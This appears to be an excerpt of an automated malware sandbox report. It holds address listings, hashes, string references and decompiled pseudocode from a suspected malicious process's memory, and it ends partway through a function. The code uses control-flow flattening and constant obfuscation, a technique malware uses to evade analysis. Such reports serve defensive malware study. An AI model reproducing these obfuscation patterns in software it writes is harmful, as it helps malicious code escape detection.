0x00215d11
0x00215d15
0x00215d1d
0x00215d25
0x00215d32
0x00215d36
0x00215d3b
0x00215d43
0x00215d4d
0x00215d5b
0x00215d60
0x00215d66
0x00215d6e
0x00215d76
0x00215d7e
0x00215d82
0x00215d8a
0x00215d92
0x00215d9a
0x00215da2
0x00215daf
0x00215db0
0x00215db4
0x00215db8
0x00215dbc
0x00215dc4
0x00215dcc
0x00215dda
0x00215dde
0x00215de7
0x00215deb
0x00215df3
0x00215df7
0x00215e09
0x00215e66
0x00215e68
0x00215e6b
0x00215e71
0x00215f29
0x00000000
0x00215e77
0x00215e77
0x00215e7d
0x00000000
0x00215e83
0x00215e87
0x00215e89
0x00215e8d
0x00215e8f
0x00000000
0x00215e91
0x00215e95
0x00215ea0
0x00215ea1
0x00215ea2
0x00215eab
0x00215eb1
0x00000000
0x00215eb3
0x00215ec6
0x00215ed8
0x00215edd
0x00215edf
0x00215ee2
0x00215ee9
0x00215eec
0x00215ef0
0x00215ef4
0x00000000
0x00215ef6
0x00000000
0x00215ef6
0x00215ef4
0x00215eb1
0x00215e8f
0x00215e7d
0x00215e0b
0x00215e11
0x00215f00
0x00215f06
0x00000000
0x00000000
0x00000000
0x00000000
0x00215e17
0x00215e1b
0x00215e28
0x00215e29
0x00215e2c
0x00215e31
0x00215e37
0x00215f0c
0x00215f0c
0x00215f12
0x00215f2d
0x00215f3a
0x00215f14
0x00215f14
0x00215f1a
0x00215f1c
0x00215f1c
0x00215e3d
0x00215e3d
0x00215e41
0x00215e43
0x00215e43
0x00215e47
0x00000000
0x00215e47
0x00215e37
0x00215e11
0x00215f28
0x00215f28
0x00215efb
0x00000000

Strings

l', xrefs: 00215BBE
z#, xrefs: 00215CFB
bA, xrefs: 00215C76
b-, xrefs: 00215D66

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: b-$bA$l'$z#
API String ID: 0-3285866504
Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction ID: c22d09598ccb7c19cd95834bc69b35079b6e41256866abc93c991f3556245071
Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
Instruction Fuzzy Hash: 4DA141B15187829FD364CF69C48984FBBE1FBD4318F508A1DF595862A0D3B4DA4A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 002180BA, Relevance: 5.1, Strings: 4, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E002180BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E0021602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E0022360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E00218736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E002250F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E002261B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E00217998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}

0x002180c0
0x002180c8
0x002180c9
0x002180d0
0x002180d3
0x002180d4
0x002180d9
0x002180e1
0x002180e4
0x002180eb
0x002180f3
0x002180f8
0x0021810c
0x0021810d
0x00218111
0x00218116
0x0021811e
0x00218126
0x0021812a
0x00218132
0x0021813a
0x00218142
0x0021814a
0x00218152
0x00218160
0x00218164
0x0021816c
0x00218179
0x0021817d
0x00218185
0x0021818d
0x00218192
0x00218197
0x0021819f
0x002181a7
0x002181ac
0x002181b4
0x002181bc
0x002181c4
0x002181cc
0x002181d4
0x002181dc
0x002181e4
0x002181ec
0x002181f4
0x002181f9
0x00218201
0x0021820e
0x00218212
0x0021821c
0x0021821c
0x0021822e
0x002182c8
0x002182cd
0x002182d0
0x00000000
0x00218234
0x0021823a
0x0021829d
0x0021829e
0x002182a2
0x002182a7
0x002182ab
0x002182ad
0x002182af
0x00000000
0x002182af
0x0021823c
0x0021823e
0x00218282
0x00218287
0x0021828a
0x00000000
0x00218240
0x00218246
0x00218267
0x0021826a
0x00000000
0x00218248
0x0021824e
0x00000000
0x00218254
0x00218254
0x00218256
0x0021825b
0x00000000
0x0021825b
0x0021824e
0x00218246
0x0021823e
0x0021823a
0x00000000
0x0021822e
0x002182ef
0x002182f4
0x002182f7
0x002182fc
0x002182fc
0x002182fc
0x00218309
0x0021830b
0x0021830f
0x0021830f
0x00218316

Strings

+%, xrefs: 00218240
XE, xrefs: 0021819F
n(, xrefs: 00218201
+%, xrefs: 00218256

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +%$+%$XE$n(
API String ID: 0-3838449085
Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction ID: d4c39b415e88def94fee429a663393df2815f5788f3d44e5022ac734761532f1
Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
Instruction Fuzzy Hash: 5A5166701097429FC358DF20D88986FBBE1BFD4348F505A1DF58696260DBB58A99CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00228D1C, Relevance: 5.1, Strings: 4, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00228D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E002285BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E0021E29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E00228D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E00218736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E00216636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

0x00228d1f
0x00228d28
0x00228d2f
0x00228d3f
0x00228d44
0x00228d4a
0x00228d52
0x00228d5a
0x00228d5f
0x00228d67
0x00228d6f
0x00228d77
0x00228d7f
0x00228d87
0x00228d8f
0x00228d97
0x00228d9f
0x00228da7
0x00228daf
0x00228db7
0x00228dbf
0x00228dc7
0x00228dd3
0x00228dd8
0x00228dde
0x00228de6
0x00228dee
0x00228dfa
0x00228dff
0x00228e09
0x00228e0c
0x00228e10
0x00228e18
0x00228e20
0x00228e28
0x00228e30
0x00228e38
0x00228e40
0x00228e45
0x00228e51
0x00228e56
0x00228e5a
0x00228e5c
0x00228e64
0x00228e6c
0x00228e74
0x00228e79
0x00228e7c
0x00228e92
0x00228e94
0x00228e9c
0x00228ea2
0x00228ea9
0x00228eaf
0x00228eb5
0x00228ebe
0x00228ecc
0x00228ecd
0x00228ed8
0x00228ede
0x00228ee5
0x00228ef0
0x00228ef5
0x00228efc
0x00228f02
0x00228f02
0x00228ede
0x00228ebe
0x00228ea9
0x00228f0e

Strings

oMt, xrefs: 00228DA7
/, xrefs: 00228E38
4A3, xrefs: 00228D5F
9*, xrefs: 00228D67

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: 12a2da9166f51097c7d324e5d9fc62b4e1c9fdaa43edd49e5dba583fc3316743
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: 175156716083429FD358CF25D48A90BFBE1FB98318F208A1CF49997260C7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00212A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00212A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00222349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0021F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00222025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00212a36
0x00212a3f
0x00212a46
0x00212a53
0x00212a58
0x00212a5d
0x00212a64
0x00212a6f
0x00212a72
0x00212a75
0x00212a78
0x00212a7f
0x00212a86
0x00212a8d
0x00212a94
0x00212a9b
0x00212aa6
0x00212aa9
0x00212ab0
0x00212ab7
0x00212abe
0x00212aca
0x00212acb
0x00212ad0
0x00212adf
0x00212ae2
0x00212ae9
0x00212af5
0x00212af8
0x00212aff
0x00212b06
0x00212b0d
0x00212b14
0x00212b1b
0x00212b22
0x00212b26
0x00212b2a
0x00212b31
0x00212b38
0x00212b3f
0x00212b46
0x00212b4d
0x00212b54
0x00212b58
0x00212b5f
0x00212b66
0x00212b6d
0x00212b77
0x00212b7a
0x00212b7c
0x00212b8f
0x00212b9d
0x00212bb2
0x00212bbe
0x00212bcd
0x00212bd3
0x00212bda

Strings

s, xrefs: 00212A9B
^, xrefs: 00212A86
+/F, xrefs: 00212A78
18, xrefs: 00212B66

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: fb703f396628a00462848d5b6e35309d0d24814d23df41d2ee090fd1b25207b8
Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: B251F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002273AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002273AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00229465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0022340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002289D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x22ca2c; // 0x558300
							E00226128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x22ca2c; // 0x558300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0021F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0021F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0021EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x002273ac
0x002273af
0x002273ba
0x002273bc
0x002273c0
0x002273c8
0x002273d0
0x002273d8
0x002273e0
0x002273f2
0x002273f6
0x002273ff
0x00227404
0x0022740a
0x00227412
0x0022741e
0x00227423
0x00227429
0x00227431
0x00227439
0x00227441
0x00227449
0x00227451
0x00227456
0x0022745e
0x00227466
0x0022746e
0x00227476
0x0022747b
0x00227480
0x00227488
0x00227495
0x00227496
0x0022749a
0x002274a2
0x002274aa
0x002274b2
0x002274ba
0x002274c2
0x002274ca
0x002274cf
0x002274d7
0x002274df
0x002274e7
0x002274ef
0x002274f7
0x002274ff
0x00227507
0x0022750c
0x00227514
0x0022751c
0x00227524
0x0022752c
0x00227534
0x00227538
0x00227540
0x00227548
0x00227550
0x00227558
0x00227560
0x00227565
0x0022756d
0x0022757b
0x0022757f
0x00227587
0x00227597
0x0022759c
0x002275a2
0x002275aa
0x002275b2
0x002275ba
0x002275bf
0x002275c4
0x002275cc
0x002275d9
0x002275da
0x002275e4
0x002275e8
0x002275ec
0x002275f4
0x002275f8
0x002275f8
0x002275fc
0x002275fc
0x002275fc
0x002275fc
0x00227602
0x00000000
0x00000000
0x00227608
0x002276e2
0x00000000
0x002276e2
0x00227614
0x00227793
0x0022779c
0x002277a2
0x002277a2
0x00227620
0x002276c4
0x002276ce
0x002276d6
0x002276d7
0x00000000
0x002276d7
0x0022762c
0x00227698
0x0022769d
0x002276a0
0x002276a3
0x00000000
0x00000000
0x002276a9
0x00000000
0x002276a9
0x00227634
0x00000000
0x0022763a
0x00227648
0x00227662
0x00227667
0x0022766e
0x00227675
0x00227678
0x00227679
0x0022767e
0x00000000
0x0022767e
0x00227634
0x002276f2
0x00227774
0x00227776
0x00000000
0x00227776
0x002276fa
0x0022775a
0x00227760
0x00227761
0x00000000
0x00227761
0x00227702
0x00000000
0x00000000
0x00227709
0x0022770e
0x00227728
0x0022772c
0x00227731
0x00227734
0x0022773a
0x00227740
0x00227740
0x0022773a
0x00000000
0x0022777b
0x0022777b
0x00000000

Strings

'V, xrefs: 0022757F
\, xrefs: 002275CC
bo, xrefs: 002275C4

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 6d02948621135205b18ec63564577868ffc7e45f205998853801d7072bb0edd4
Instruction ID: aae246f9f42e6ff4341316f04a3e28c187d1d06227f08f204b1a4f5df0f2d613
Opcode Fuzzy Hash: 6d02948621135205b18ec63564577868ffc7e45f205998853801d7072bb0edd4
Instruction Fuzzy Hash: 87A1727151C342AFD358CF68D48940BFBE1FB84318F50892DF59596260C7B58A688F87

Uniqueness

Uniqueness Score: -1.00%

Function 002196CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002196CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0021602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
